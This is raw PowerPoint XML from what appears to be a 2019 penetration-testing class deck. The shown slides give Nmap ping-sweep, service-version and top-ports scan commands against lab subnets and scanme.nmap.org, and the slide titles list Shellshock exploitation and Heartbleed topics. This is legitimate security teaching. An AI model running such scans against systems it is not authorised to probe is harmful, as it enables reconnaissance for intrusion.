            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> 10.0.0.0-254. </a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>This reveals the hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.10,10.0.0.100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2106" name="Google Shape;2106;p110"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287" y="2353513"/>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Write an Nmap command to perform a service/version scan of the live hosts you discover. Save the results as an XML file to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/tmp/results.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2107" name="Google Shape;2107;p110"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="3200600"/>
            <a:ext cx="9144000" cy="960000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> 10.0.0.10 10.0.0.100-101 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>results.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>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111"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2112" name="Google Shape;2112;p111"/>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Nmap Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2113" name="Google Shape;2113;p111"/>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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>--top-ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to scan the top 100 ports of the live hosts you discovered above. Save the results to an XML file. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2114" name="Google Shape;2114;p11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9</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2115" name="Google Shape;2115;p111"/>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116" name="Google Shape;2116;p111"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="1378748"/>
            <a:ext cx="9144000" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2117" name="Google Shape;2117;p111"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287" y="2353513"/>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dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>--top-ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> to can the top 20 ports of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>scanme.nmap.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>. Save the results as a normal file. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2118" name="Google Shape;2118;p111"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263" y="2854300"/>
            <a:ext cx="9144000" cy="1005000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>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284</TotalTime>
  <Words>2501</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>309</Paragraphs>
  <Slides>38</Slides>
  <Notes>38</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38</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="50" baseType="lpstr">
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto Mono Medium</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Mono</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Mono Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Pentesting Week 1, Day 2</vt:lpstr>
      <vt:lpstr>Class Objectives</vt:lpstr>
      <vt:lpstr>Class Objectives</vt:lpstr>
      <vt:lpstr>Where Are We?</vt:lpstr>
      <vt:lpstr>15 Minutes</vt:lpstr>
      <vt:lpstr>Nmap Warm Up Review</vt:lpstr>
      <vt:lpstr>Nmap Warm Up Review</vt:lpstr>
      <vt:lpstr>Nmap Warm Up Review</vt:lpstr>
      <vt:lpstr>Nmap Warm Up Review</vt:lpstr>
      <vt:lpstr>Nmap Warm Up Review</vt:lpstr>
      <vt:lpstr>Nmap Warm Up Review</vt:lpstr>
      <vt:lpstr>Shellshock</vt:lpstr>
      <vt:lpstr>Introducing Shellshock</vt:lpstr>
      <vt:lpstr>Shellshock</vt:lpstr>
      <vt:lpstr>Shellshock</vt:lpstr>
      <vt:lpstr>Shellshock</vt:lpstr>
      <vt:lpstr>Shellshock</vt:lpstr>
      <vt:lpstr>20 minutes</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Researching Shellshock Review</vt:lpstr>
      <vt:lpstr>Researching Shellshock Review</vt:lpstr>
      <vt:lpstr>Researching Shellshock Review</vt:lpstr>
      <vt:lpstr>Researching Shellshock Review</vt:lpstr>
      <vt:lpstr>Researching Shellshock Review</vt:lpstr>
      <vt:lpstr>Researching Shellshock Review</vt:lpstr>
      <vt:lpstr>Researching Shellshock Review</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Activity:  Scanning and Enumeration In this exercise, you will perform host discovery and service enumeration on a target subnet. Then, you will scan live hosts for vulnerability to Shellshock and research Heartbleed. Instructions sent via Slack.  </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Scanning and Enumeration Review</vt:lpstr>
      <vt:lpstr>Scanning and Enumeration Review</vt:lpstr>
      <vt:lpstr>Scanning and Enumeration Review</vt:lpstr>
      <vt:lpstr>Scanning and Enumeration Review</vt:lpstr>
      <vt:lpstr>Scanning and Enumeration Review</vt:lpstr>
      <vt:lpstr>40 minutes</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Shellshock Exploitation Review</vt:lpstr>
      <vt:lpstr>Class Objectives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Pentesting Week 1, Day 2</dc:title>
  <cp:lastModifiedBy>Tony Wilson</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-03T03:08:43Z</dcterms:modified>
</cp:coreProperties>
</file>